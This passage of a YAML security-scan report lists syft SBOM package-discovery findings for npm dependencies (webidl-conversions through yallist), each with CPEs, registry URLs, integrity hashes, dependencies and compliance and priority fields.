cpe: cpe:2.3:a:webidl-conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:webidl_conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:webidl_conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:webidl:webidl-conversions:3.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:webidl:webidl_conversions:3.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/webidl-conversions@3.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz + integrity: sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c76cb0d14c517e35 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: websocket-driver 0.7.4' + title: websocket-driver 0.7.4 + description: 'Package discovered: websocket-driver 0.7.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 944bd0667b1458ca + name: websocket-driver + version: 0.7.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:websocket-driver:websocket-driver:0.7.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:websocket-driver:websocket_driver:0.7.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:websocket_driver:websocket-driver:0.7.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:websocket_driver:websocket_driver:0.7.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:websocket:websocket-driver:0.7.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:websocket:websocket_driver:0.7.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/websocket-driver@0.7.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz + integrity: sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg== + dependencies: + http-parser-js: '>=0.5.1' + safe-buffer: '>=5.1.0' + websocket-extensions: '>=0.1.1' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: bb5b0fea2c384fe7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: websocket-extensions 0.1.4' + title: websocket-extensions 0.1.4 + description: 'Package discovered: websocket-extensions 0.1.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6844e064384011a8 + name: websocket-extensions + version: 0.1.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:websocket-extensions_project:websocket-extensions:0.1.4:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/websocket-extensions@0.1.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz + integrity: sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c0ee8f2bbf5fd4e3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: whatwg-url 5.0.0' + title: whatwg-url 5.0.0 + description: 'Package discovered: whatwg-url 5.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0827d54a7a5ea1e5 + name: whatwg-url + version: 5.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:whatwg-url:whatwg-url:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:whatwg-url:whatwg_url:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:whatwg_url:whatwg-url:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:whatwg_url:whatwg_url:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:whatwg:whatwg-url:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:whatwg:whatwg_url:5.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/whatwg-url@5.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz + integrity: sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw== + dependencies: + tr46: ~0.0.3 + webidl-conversions: ^3.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 10cad46c067a700f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: which 2.0.2' + title: which 2.0.2 + description: 'Package discovered: which 2.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 414763db2a64d1aa + name: which + version: 2.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:which:which:2.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/which@2.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/which/-/which-2.0.2.tgz + integrity: sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA== + dependencies: + isexe: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 20ac7377e7b68a5f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: which-module 2.0.1' + title: which-module 2.0.1 + description: 'Package discovered: which-module 2.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e9c9cc83bf436fd2 + name: which-module + version: 2.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:which-module:which-module:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:which-module:which_module:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:which_module:which-module:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:which_module:which_module:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:which:which-module:2.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:which:which_module:2.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/which-module@2.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/which-module/-/which-module-2.0.1.tgz + integrity: sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9ffab25d563bb6a3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: wrap-ansi 6.2.0' + title: wrap-ansi 6.2.0 + description: 'Package discovered: wrap-ansi 6.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1fadca0371d5cfaf + name: wrap-ansi + version: 6.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap:wrap-ansi:6.2.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap:wrap_ansi:6.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/wrap-ansi@6.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz + integrity: sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA== + dependencies: + ansi-styles: ^4.0.0 + string-width: ^4.1.0 + strip-ansi: ^6.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: '8455272704618757' + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: wrap-ansi 7.0.0' + title: wrap-ansi 7.0.0 + description: 'Package discovered: wrap-ansi 7.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 336621830c576ca4 + name: wrap-ansi + version: 7.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap:wrap-ansi:7.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap:wrap_ansi:7.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/wrap-ansi@7.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz + integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q== + dependencies: + ansi-styles: ^4.0.0 + string-width: ^4.1.0 + strip-ansi: ^6.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 686325d7e763de93 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: wrap-ansi 8.1.0' + title: wrap-ansi 8.1.0 + description: 'Package discovered: wrap-ansi 8.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 49a7c54fcd626265 + name: wrap-ansi + version: 8.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap:wrap-ansi:8.1.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:wrap:wrap_ansi:8.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/wrap-ansi@8.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz + integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ== + dependencies: + ansi-styles: ^6.1.0 + string-width: ^5.0.1 + strip-ansi: ^7.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 20b8ef0a2e52c375 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: wrappy 1.0.2' + title: wrappy 1.0.2 + description: 'Package discovered: wrappy 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3d054461229ae629 + name: wrappy + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:wrappy:wrappy:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/wrappy@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz + integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d249fddb72dddcbc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ws 8.18.3' + title: ws 8.18.3 + description: 'Package discovered: ws 8.18.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 20d4f853542f41c9 + name: ws + version: 8.18.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ws_project:ws:8.18.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/ws@8.18.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ws/-/ws-8.18.3.tgz + integrity: sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c71da5915aeb2537 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: xmlbuilder 13.0.2' + title: xmlbuilder 13.0.2 + description: 'Package discovered: xmlbuilder 13.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0872acd31442749a + name: xmlbuilder + version: 13.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:xmlbuilder:xmlbuilder:13.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/xmlbuilder@13.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-13.0.2.tgz + integrity: sha512-Eux0i2QdDYKbdbA6AM6xE4m6ZTZr4G4xF9kahI2ukSEMCzwce2eX9WlTI5J3s+NU7hpasFsr8hWIONae7LluAQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fd4707cd0572bee3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: xmlhttprequest-ssl 2.1.2' + title: xmlhttprequest-ssl 2.1.2 + description: 'Package discovered: xmlhttprequest-ssl 2.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9551f10f27f0ee2d + name: xmlhttprequest-ssl + version: 2.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/xmlhttprequest-ssl@2.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-2.1.2.tgz + integrity: sha512-TEU+nJVUUnA4CYJFLvK5X9AOeH4KvDvhIfm0vV1GaQRtchnG0hgK5p8hw/xjv8cunWYCsiPCSDzObPyhEwq3KQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a5a624f94f45bfc0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: xtend 4.0.2' + title: xtend 4.0.2 + description: 'Package discovered: xtend 4.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6f2d4b5e4aa5bc10 + name: xtend + version: 4.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:xtend:xtend:4.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/xtend@4.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz + integrity: sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5d318a2cd2d1309b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: y18n 4.0.3' + title: y18n 4.0.3 + description: 'Package discovered: y18n 4.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f92fb588898c98cc + name: y18n + version: 4.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:y18n_project:y18n:4.0.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/y18n@4.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz + integrity: sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ff7837262c7a0506 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: y18n 5.0.8' + title: y18n 5.0.8 + description: 'Package discovered: y18n 5.0.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 17090a29739955b3 + name: y18n + version: 5.0.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:y18n_project:y18n:5.0.8:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/y18n@5.0.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz + integrity: sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 20985a40c61069a1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: yallist 4.0.0' + title: yallist 4.0.0 + description: 'Package discovered: yallist 4.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + 